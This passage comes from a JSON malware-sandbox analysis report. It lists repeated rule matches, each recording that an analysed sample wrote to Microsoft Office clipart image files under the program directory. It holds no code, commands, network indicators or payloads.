"_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41620", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph00780u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01035u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41631", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01035u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01046j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41640", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01046j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01179j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41663", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01179j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01213K.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01213k.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41674", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01213k.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01221K.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01221k.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41681", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01221k.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01235u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41688", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01235u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01236u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41697", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01236u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01239k.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41706", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01239k.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01247u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41713", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01247u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01255G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01255g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41722", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01255g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01265u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41729", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01265u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01332u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41738", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01332u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01478u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41747", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01478u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01562u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41756", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01562u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01607u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41765", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01607u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01931j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41774", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01931j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02028k.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41785", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02028k.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02039u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41794", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02039u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02040u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41803", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02040u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02053j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41812", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02053j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02058u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41821", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02058u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02062u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41830", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02062u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02069j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41839", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02069j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02071u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41848", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02071u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02074u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41857", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02074u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02208u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41866", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02208u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02223u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41875", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02223u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02291u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41884", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02291u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02398u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41893", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02398u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02412k.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41902", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02412k.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02417u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41909", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02417u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02466u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41918", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02466u.bmp\".", "technique_path": 